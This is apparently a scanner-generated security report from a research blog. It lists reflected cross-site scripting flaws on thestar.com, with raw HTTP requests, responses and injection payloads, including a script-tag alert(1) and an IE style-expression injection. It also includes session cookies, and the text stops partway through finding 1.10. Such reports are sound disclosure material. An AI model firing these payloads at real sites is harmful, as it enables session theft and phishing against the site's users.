XSS. CAPEC-86, CWE-79, Cross Site Scripting, www.thestar.com

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX Research Blog at Sat Mar 05 20:33:35 CST 2011.


The DORK Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.thestar.com/ScriptResource.axd [REST URL parameter 1]

1.2. http://www.thestar.com/Toplets/User [REST URL parameter 1]

1.3. http://www.thestar.com/Toplets/User [REST URL parameter 2]

1.4. http://www.thestar.com/Toplets/User [name of an arbitrarily supplied request parameter]

1.5. http://www.thestar.com/Toplets/User/ [REST URL parameter 1]

1.6. http://www.thestar.com/Toplets/User/ [REST URL parameter 2]

1.7. http://www.thestar.com/WebResource.axd [REST URL parameter 1]

1.8. http://www.thestar.com/control-update [REST URL parameter 1]

1.9. http://www.thestar.com/control-update [id parameter]

1.10. http://www.thestar.com/favicon.ico [REST URL parameter 1]

1.11. http://www.thestar.com/includes/headerweather [REST URL parameter 1]

1.12. http://www.thestar.com/includes/headerweather [REST URL parameter 2]

1.13. http://www.thestar.com/includes/promostrip [REST URL parameter 1]

1.14. http://www.thestar.com/includes/promostrip [REST URL parameter 2]

1.15. http://www.thestar.com/living [REST URL parameter 1]

1.16. http://www.thestar.com/mostpopular [REST URL parameter 1]

1.17. http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht [REST URL parameter 1]

1.18. http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht [REST URL parameter 2]

1.19. http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht [REST URL parameter 3]

1.20. http://www.thestar.com/tops-counter [REST URL parameter 1]

1.21. http://www.thestar.com/xd_receiver.htm [REST URL parameter 1]



1. Cross-site scripting (reflected)
There are 21 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



1.1. http://www.thestar.com/ScriptResource.axd [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /ScriptResource.axd

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b492'%3b45c93447ecf was submitted in the REST URL parameter 1. This input was echoed as 9b492';45c93447ecf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /9b492'%3b45c93447ecf?d=pH7mAzwvgoianxW_DuJ-UkpQXwWkmBbba8OP6ciSRwxsgvjXY6FG_doBbOoPKafplov8l3IxG384846773uuLedRtTgDVO_jYWwx14JW1J0nCnU8_Rudh3AoMz4iqNga31gZx_HZoyVlWAOzNjSezz9VK-4D65dpdnwJfGYX0DrWeSNc0&t=ffffffff884fd07d HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; s_vnumb=1297998572502%3E0%3A2; __utma=129518793.1069648812.1297974345.1297974345.1297998573.2; ASP.NET_SessionId=s3nyc032t0kvzc2e1vv1gv45; BIGipServerTOPS-WebFarm5=604050348.20480.0000

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 05 Mar 2011 23:50:03 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-1
cache-control: public, max-age = 300
Date: Sat, 05 Mar 2011 23:45:30 GMT
X-Varnish: 2676952159
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 52145


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_9b492';45c93447ecf_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.2. http://www.thestar.com/Toplets/User [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /Toplets/User

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9477e'%3b47b32776216 was submitted in the REST URL parameter 1. This input was echoed as 9477e';47b32776216 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Toplets9477e'%3b47b32776216/User HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/control-update
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; s_vnumb=1299368826776%3E0%3A1-16%3A2; __utmz=129518793.1299368840.3.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129518793.1069648812.1297974345.1297998573.1299368836.3; fbsetting_e52ab4b1285fa2e64697937423b7772b=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; BIGipServerTOPS-WebFarm5=604050348.20480.0000

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sun, 06 Mar 2011 02:15:59 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-1
cache-control: public, max-age = 300
Date: Sun, 06 Mar 2011 02:11:25 GMT
X-Varnish: 2677894320
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 51855


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_toplets9477e';47b32776216_user_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.3. http://www.thestar.com/Toplets/User [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /Toplets/User

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b2ba'%3bf0cf5fd8822 was submitted in the REST URL parameter 2. This input was echoed as 5b2ba';f0cf5fd8822 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Toplets/User5b2ba'%3bf0cf5fd8822 HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/control-update
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; s_vnumb=1299368826776%3E0%3A1-16%3A2; __utmz=129518793.1299368840.3.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129518793.1069648812.1297974345.1297998573.1299368836.3; fbsetting_e52ab4b1285fa2e64697937423b7772b=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; BIGipServerTOPS-WebFarm5=604050348.20480.0000

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-4
cache-control: public, max-age = 300
Date: Sun, 06 Mar 2011 02:12:08 GMT
X-Varnish: 2677899118
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 51695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_toplets_user5b2ba';f0cf5fd8822_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.4. http://www.thestar.com/Toplets/User [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thestar.com
Path:   /Toplets/User

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 469d2"><script>alert(1)</script>a4549f98675 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Toplets/User?469d2"><script>alert(1)</script>a4549f98675=1 HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/control-update
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; s_vnumb=1299368826776%3E0%3A1-16%3A2; __utmz=129518793.1299368840.3.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129518793.1069648812.1297974345.1297998573.1299368836.3; fbsetting_e52ab4b1285fa2e64697937423b7772b=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; BIGipServerTOPS-WebFarm5=604050348.20480.0000

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-5
cache-control: public, max-age = 300
Date: Sun, 06 Mar 2011 02:10:10 GMT
X-Varnish: 2677886090
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 51226


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<a href="/app/Login?ReturnUrl=/Toplets/User?469d2"><script>alert(1)</script>a4549f98675=1" rel="nofollow">
...[SNIP]...

1.5. http://www.thestar.com/Toplets/User/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /Toplets/User/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55b1d'%3b3b6253a4492 was submitted in the REST URL parameter 1. This input was echoed as 55b1d';3b6253a4492 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Toplets55b1d'%3b3b6253a4492/User/ HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/control-update
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; s_vnumb=1299368826776%3E0%3A1-16%3A2; __utmz=129518793.1299368840.3.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129518793.1069648812.1297974345.1297998573.1299368836.3; fbsetting_e52ab4b1285fa2e64697937423b7772b=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; BIGipServerTOPS-WebFarm5=604050348.20480.0000

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sun, 06 Mar 2011 02:16:17 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-2
cache-control: public, max-age = 300
Date: Sun, 06 Mar 2011 02:11:42 GMT
X-Varnish: 2677896291
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 51855


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_toplets55b1d';3b6253a4492_user_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.6. http://www.thestar.com/Toplets/User/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /Toplets/User/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7efbc'%3b65b9d58675 was submitted in the REST URL parameter 2. This input was echoed as 7efbc';65b9d58675 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Toplets/User7efbc'%3b65b9d58675/ HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/control-update
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; s_vnumb=1299368826776%3E0%3A1-16%3A2; __utmz=129518793.1299368840.3.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129518793.1069648812.1297974345.1297998573.1299368836.3; fbsetting_e52ab4b1285fa2e64697937423b7772b=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; BIGipServerTOPS-WebFarm5=604050348.20480.0000

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-2
cache-control: public, max-age = 300
Date: Sun, 06 Mar 2011 02:12:29 GMT
X-Varnish: 2677901296
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 51672


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_toplets_user7efbc';65b9d58675_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.7. http://www.thestar.com/WebResource.axd [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /WebResource.axd

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2783e'%3b6847f5e62fb was submitted in the REST URL parameter 1. This input was echoed as 2783e';6847f5e62fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /2783e'%3b6847f5e62fb?d=HR7uDu3acxKLRRtvJRrUzlM2KBUPhRA54oKnQyinpkiX78Zh-8GFkaTFUZtL3UX2QKgR-eyaZw6VhMZU0a-aiD-cz_epKbApsCjYd8JAN6DezHRTdOVurflaTC-21i3s-GVMeaGjS07zsXtGuIRVSsiFPkvHYsCF9grTwiaUEUiKSPVTGYbHZLYk0gUaz-co6BOQ-A2&t=634115911180000000 HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; s_vnumb=1297998572502%3E0%3A2; __utma=129518793.1069648812.1297974345.1297974345.1297998573.2; ASP.NET_SessionId=s3nyc032t0kvzc2e1vv1gv45; BIGipServerTOPS-WebFarm5=604050348.20480.0000

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 05 Mar 2011 23:50:17 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-4
cache-control: public, max-age = 300
Date: Sat, 05 Mar 2011 23:45:43 GMT
X-Varnish: 2676953714
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 52225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_2783e';6847f5e62fb_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.8. http://www.thestar.com/control-update [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /control-update

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26bd2'%3b034e387401e was submitted in the REST URL parameter 1. This input was echoed as 26bd2';034e387401e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /control-update26bd2'%3b034e387401e HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht
Origin: http://www.thestar.com
Content-type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; __utma=129518793.1069648812.1297974345.1297974345.1297998573.2; ASP.NET_SessionId=s3nyc032t0kvzc2e1vv1gv45; BIGipServerTOPS-WebFarm5=604050348.20480.0000; s_cc=true; s_vnumb=1299368826776%3E0%3A1-16%3A2; s_vnumb_s=3; s_sq=%5B%5BB%5D%5D
Content-Length: 301

id=ctl00$ctl00$cph_contentBody$cph_leftContentContainer$c_bottom$Template0$ctl00$CaseTemplate10$UserFavoritesButton1&source=~/Toplets/User/UserFavoritesButton.ascx&duration=-1&AssetUid=947793&&hosting
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-4
cache-control: public, max-age = 300
Date: Sat, 05 Mar 2011 23:47:12 GMT
X-Varnish: 2676963819
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 52029


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_control-update26bd2';034e387401e_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.9. http://www.thestar.com/control-update [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thestar.com
Path:   /control-update

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8465"style%3d"x%3aexpression(alert(1))"db46e930d86 was submitted in the id parameter. This input was echoed as f8465"style="x:expression(alert(1))"db46e930d86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /control-update HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.thestar.com/news/world/pirates/article/947793--dutch-couple-rescued-after-pirates-hijack-yacht
Origin: http://www.thestar.com
Content-type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; __utma=129518793.1069648812.1297974345.1297974345.1297998573.2; ASP.NET_SessionId=s3nyc032t0kvzc2e1vv1gv45; BIGipServerTOPS-WebFarm5=604050348.20480.0000; s_cc=true; s_vnumb=1299368826776%3E0%3A1-16%3A2; s_vnumb_s=3; s_sq=%5B%5BB%5D%5D
Content-Length: 301

id=ctl00$ctl00$cph_contentBody$cph_leftContentContainer$c_bottom$Template0$ctl00$CaseTemplate10$UserFavoritesButton1f8465"style%3d"x%3aexpression(alert(1))"db46e930d86&source=~/Toplets/User/UserFavoritesButton.ascx&duration=-1&AssetUid=947793&&hostingPageUrl=%2fnews%2fworld%2fpirates%2farticle%2f947793--dutch-couple-rescued-after-pirates-hijack-yacht

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-4
cache-control: public, max-age = 300
Date: Sat, 05 Mar 2011 23:42:54 GMT
X-Varnish: 2676934809
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 307

<a href="Toplets/User/#" id="ctl00_ctl00_cph_contentBody_cph_leftContentContainer_c_bottom_Template0_ctl00_CaseTemplate10_UserFavoritesButton1f8465"style="x:expression(alert(1))"db46e930d86_addFav" class="td-IcoFavorite displayBlock" onclick="return TD.ProjectTheStar.PopupLogin();">
...[SNIP]...

1.10. http://www.thestar.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1661'%3b02cd8921a85 was submitted in the REST URL parameter 1. This input was echoed as f1661';02cd8921a85 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /f1661'%3b02cd8921a85 HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Accept: */*
